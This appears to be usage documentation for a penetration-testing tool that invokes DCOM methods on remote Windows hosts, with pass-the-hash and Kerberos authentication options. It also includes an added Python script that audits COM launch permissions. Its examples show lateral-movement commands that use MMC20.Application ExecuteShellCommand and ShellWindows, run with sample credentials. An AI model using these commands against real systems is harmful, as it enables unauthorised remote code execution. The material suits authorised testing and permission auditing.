The Dcom tool activates a COM object by CLSID on a remote system and invokes methods on it via OLE Automation (IDispatch). This lets you execute functionality exposed by DCOM objects without writing custom COM client code.

Subcommands

Command    Description
invoke     Activate a DCOM object and invoke a method on it
For help on any subcommand, run Dcom <subcommand> -h.

invoke

Activates an OLE Automation object by CLSID on a remote server and calls a named method on it, optionally passing arguments.
Dcom invoke [options] -Clsid <Guid> -MethodName <String> <ServerName> <Clsid> <MethodName> [<Arguments>]
ServerName (string, required)
  Hostname or IP address of the server to connect to.
-Clsid (Guid, required)
  CLSID (class identifier) of the COM object to activate, in standard {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} format.
-MethodName (-M) (string, required)
  Name of the method to invoke on the activated object.
-Arguments (string[])
  Arguments to pass to the method. Arguments are passed in order.
-EncryptRpc (-E) (boolean)
  Encrypt all RPC messages exchanged with the remote object.
-ConsoleOutputStyle (-OutputStyle) (string)
  Output format: Freeform, Raw, Table, List, Csv, Tsv, Json.
-SpnOverride (SpnMapping[])
  Override the Service Principal Name used for Kerberos authentication.
-AuthProxy (EndPoint)
  Endpoint of an authentication proxy.
-Socks5 (string)
  SOCKS5 proxy endpoint (host:port).
-UserName (-u) (string)
  User name (without domain).
-UserDomain (-ud) (string)
  Domain of the authenticating user.
-Password (-p) (string)
  Password.
-NtlmHash (string)
  NTLM hash for pass-the-hash.
-Anonymous (boolean)
  Use anonymous authentication.
-AesKey (string)
  AES-128 or AES-256 Kerberos key.
-Tgt (string)
  TGT file path (.kirbi or ccache).
-Kdc (-K) (string)
  KDC endpoint (host:port).
-S4UserName (string)
  User to impersonate via S4U2self.
-HostAddress (-ha) (string[])
  Override network address(es) of the server.
-UseTcp6Only (-6) (boolean)
  Use TCP over IPv6 only.
-UseTcp4Only (-4) (boolean)
  Use TCP over IPv4 only.
-Verbose (-V) (boolean)
  Print verbose messages.
-Diagnostic (-vv) (boolean)
  Print diagnostic messages.
-LogLevel (string)
  Minimum log severity: Debug, Diagnostic, Verbose, Info, Warning, Error, Critical.

Common usage patterns

The MMC20.Application object ({49B2791A-B1AE-4C90-9B8E-E860BA07F889}) exposes a Document.ActiveView.ExecuteShellCommand method that can be used for remote code execution:
Dcom invoke -UserName milchick@LUMON -Password Br3@kr00m! \
  LUMON-FS1 \
  {49B2791A-B1AE-4C90-9B8E-E860BA07F889} \
  -MethodName Document.ActiveView.ExecuteShellCommand \
  -Arguments cmd.exe, "", "cmd /c whoami > C:\\out.txt", "7"
The ShellWindows object ({9BA05972-F6A8-11CF-A442-00A0C90A8F39}) is another common target:
Dcom invoke -UserName milchick@LUMON -Password Br3@kr00m! \
  LUMON-FS1 \
  {9BA05972-F6A8-11CF-A442-00A0C90A8F39} \
  -MethodName Item -Arguments 0
Use Reg getdcomapp to read DCOM application launch and access permissions from the registry before invoking:
# Check if you have launch permission
Reg getdcomapp -UserName milchick@LUMON -Password Br3@kr00m! \
  LUMON-FS1 \
  -AppId {49B2791A-B1AE-4C90-9B8E-E860BA07F889} \
  -OutputFields AppId, Title, LaunchPermissions, AccessPermissions
DCOM invocations execute code on the remote system under the security context of the activated object. Verify that your engagement authorizes remote code execution before using invoke.
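
The launch and access permission check above, turned into an audit as an added example (not part of the tool or its documentation): it lists the non-admin trustees whose allow ACEs grant remote launch or activation. It assumes the LaunchPermissions value is available as an SDDL string; the function names, the admin baseline and the sample descriptor are constructed for illustration.

```python
import re

# COM launch/activation right bits (Windows SDK COM_RIGHTS_* values).
COM_RIGHTS = {0x01: "Execute", 0x02: "ExecuteLocal", 0x04: "ExecuteRemote",
              0x08: "ActivateLocal", 0x10: "ActivateRemote"}
REMOTE_BITS = 0x04 | 0x10
# SDDL two-letter right codes that occupy the same five bits.
SDDL_BITS = {"CC": 0x01, "DC": 0x02, "LC": 0x04, "SW": 0x08, "RP": 0x10}
# Assumed baseline: trustees expected to hold remote rights (Administrators, SYSTEM).
ADMIN_TRUSTEES = {"BA", "SY", "S-1-5-32-544", "S-1-5-18"}
# One ACE: (type;flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\(([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*)\)")

def decode_mask(rights):
    """Turn an SDDL rights field (hex, decimal, or letter pairs) into a bit mask."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+|\d+", rights):
        return int(rights, 16 if rights[:2].lower() == "0x" else 10)
    mask = 0
    for i in range(0, len(rights), 2):
        code = rights[i:i + 2]
        if code not in SDDL_BITS:
            raise ValueError(f"unexpected right {code!r} in a COM permission ACE")
        mask |= SDDL_BITS[code]
    return mask

def remote_grants(sddl):
    """Map each non-admin trustee to the remote COM rights its allow ACEs grant."""
    # Deny ACEs are not evaluated: resolving them needs group membership.
    masks = {}
    for ace_type, _flags, rights, _obj, _iobj, trustee in ACE_RE.findall(sddl):
        if ace_type != "A":  # only access-allowed ACEs grant rights
            continue
        mask = decode_mask(rights)
        # Legacy (pre-XP SP2) ACE: Execute alone covers local and remote access.
        if mask & 0x01 and not mask & 0x1E:
            mask = 0x1F
        if mask & REMOTE_BITS and trustee not in ADMIN_TRUSTEES:
            masks[trustee] = masks.get(trustee, 0) | (mask & REMOTE_BITS)
    return {t: [n for b, n in COM_RIGHTS.items() if m & b] for t, m in masks.items()}

# Constructed sample LaunchPermission SDDL (not taken from a real host).
SAMPLE = ("O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCLCSWRP;;;SY)"
          "(A;;CCDCSW;;;WD)(A;;0x1f;;;AU)(A;;CC;;;IU)")

if __name__ == "__main__":
    for trustee, rights in remote_grants(SAMPLE).items():
        print(f"{trustee}: {', '.join(rights)}")
```

In the sample, Everyone (WD) holds local rights only and is not reported, while the Authenticated Users (AU) and Interactive (IU) entries are.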

Reg getdcomapp

Read DCOM application launch and access permissions from the remote registry.

Reg set

Modify DCOM application configuration in the registry.
